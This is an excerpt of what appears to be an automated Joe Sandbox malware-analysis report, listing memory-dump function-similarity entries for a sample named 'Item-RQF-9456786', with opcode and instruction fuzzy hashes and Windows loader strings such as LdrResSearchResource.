                                                                                    • API String ID: 48624451-232158463
                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 017AAA25
                                                                                    • LdrResSearchResource Enter, xrefs: 017AAA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                                                    • kLsE, xrefs: 017A0540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Instruction ID: a81cbd1ea2d2432e19d8db1be3d522bcd6c8b917be7a47fdff3db8e77b79c0b8
                                                                                    • Opcode Fuzzy Hash: 12e5738864375b429fe9754f715ce257195e9d8aa97ac77dfeb53c2616192cf3
                                                                                    • Instruction Fuzzy Hash: 6B717176604342ABDB21CF29C984B6BF7E4BB48258F14492DFB55D7350E730E984CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                                                    • Instruction ID: e750f47676a95600baeaed61586530467d99b782dd1c8b3d353334da1644e686
                                                                                    • Opcode Fuzzy Hash: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                                                    • Instruction Fuzzy Hash: 88815E71A00609AFDB26CFA9C880BEEFBFAFF48354F144429E555A7254DB30AD45CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                                                    • Instruction ID: bfdae8a0097f9861468c04aec80cdeab4291f5f3482a71af1dbae588dd05ac52
                                                                                    • Opcode Fuzzy Hash: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                                                    • Instruction Fuzzy Hash: E171DF75D00629DBCB268F59C9907FEFBB1FF59710F14815AE942AB390E3709940CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                                                    • Instruction ID: b3d9a60e0b40aefba73f1820b0edefba13bd74f35cc3071e497d5433c0b58167
                                                                                    • Opcode Fuzzy Hash: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                                                    • Instruction Fuzzy Hash: F371F1316052428FD312DF2CC484BAAF7E5FF84314F0485AAE898CB756EB34E946CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                    • Instruction ID: dd0c7f760964975dec0fce6b4bd7cba7810a90c28419d1cb07b91227af8ffef9
                                                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                    • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                                                    • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                                                    • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                                                    • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                                                    • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                                                    • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                                                    • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction ID: 27f19a760fdf01417a8cf9d335e51fa7c4fc371c75c90dff06768c6c2f3b9ab6
                                                                                    • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction Fuzzy Hash: CC518E72E1060EDFCB56CF9CC9806EEBBB1FB89310F188569D915FB280D635AA40CB54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf5f1f5081844516ee152842fa1f81b122d8dafed407fa6c794e9f13133bcdbd
                                                                                    • Instruction ID: a0cd586d57d513f93b213f220a25042d0d9c545fd395cfba2d5bde3d00aa6873
                                                                                    • Opcode Fuzzy Hash: cf5f1f5081844516ee152842fa1f81b122d8dafed407fa6c794e9f13133bcdbd
                                                                                    • Instruction Fuzzy Hash: EE51B0726043029FD711DF28C840BAABBE9FF95354F04492CFA89D7290D734EA48CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                                                    • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                                                    • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                                                    • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                                                    • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                                                    • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                                                    • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                                                    • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                                                    • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                                                    • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                    • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                    • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                                                    • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                                                    • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                                                    • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                                                    • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                                                    • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                                                    • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                                                    • Instruction ID: 519b3bc8ef7cb41f8522ee9945da4167bba61f5ea48491570d4b714792967c60
                                                                                    • Opcode Fuzzy Hash: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                                                    • Instruction Fuzzy Hash: 28412B72B002069BCB25EFA898C5F7AB774FB58718F5504ACED16DB249E7B1DA00CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                    • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                    • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    • Instruction ID: 6caa5922d69a46558d42ba289feb70425d802bd4f3f393f6ffc6c3dc6c29728f
                                                                                    • Opcode Fuzzy Hash: 3fd58a9f93feddb6a14d37a42466f7d99d8fd13cfef9fec254b4ba26f3125968
                                                                                    • Instruction Fuzzy Hash: D841BD71200B09DFD763CF28C884BD6BBE9BF49354F048529E65ACB291C770E900CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                    • Instruction ID: 44bf517604fe2e603262671f833259bc387b2d53bbbf5f4329151f1cb0bfabfe
                                                                                    • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                    • Instruction Fuzzy Hash: 6231D67210530AAFD726DA15C845EABBBE8EF50750F04492DFA50C7251EA70EE14CBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                                                    • Instruction ID: 74e592b2d449648153858fb5c0320a2f1e35eaba738c333d4f5eaa5410a710a3
                                                                                    • Opcode Fuzzy Hash: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                                                    • Instruction Fuzzy Hash: 1131A0727016869BF3235B5CCD88F65BBDCBB40B44F1D04A0AE46EB6D5DB28DA80C221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                                                    • Instruction ID: 6966f9c6a5252774bedace0b7ec0b833a1913b80049dfc7d8b38b92eb5d11e11
                                                                                    • Opcode Fuzzy Hash: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                                                    • Instruction Fuzzy Hash: 8B31B275A0015AABDB15DF98C884FAEB7B9FB48B40F554168E901EB344E770AE40CB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                                                    • Instruction ID: 6eb000f220b5e12cf47be026d9754a8a0bf1143b12d664c268a8739bbcd010d7
                                                                                    • Opcode Fuzzy Hash: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                                                    • Instruction Fuzzy Hash: CF313376A4012DABCF21DF54DC88BDEBBF5AB98350F1401A5A508E7260DA309F919F90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                                                    • Instruction ID: 619f1656e0b54067e146f82db90366e07e772fbaf2c1ffffe2930eb65bbbab15
                                                                                    • Opcode Fuzzy Hash: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                                                    • Instruction Fuzzy Hash: 6131B272A01219AFDB32DEA9CC40EAEFBF8EF44750F018469E915D7250D6709E008BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                                                    • Instruction ID: 831edc2528853fb5296912b5a8dfe61ce2d0f859ad08a58e1df9e57169d22073
                                                                                    • Opcode Fuzzy Hash: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                                                    • Instruction Fuzzy Hash: A231C871700A46EFDB129FA9C890B6ABBBDAF44754F25406DE505EB342EB30DE018B90
                                                                                    Memory Dump Source
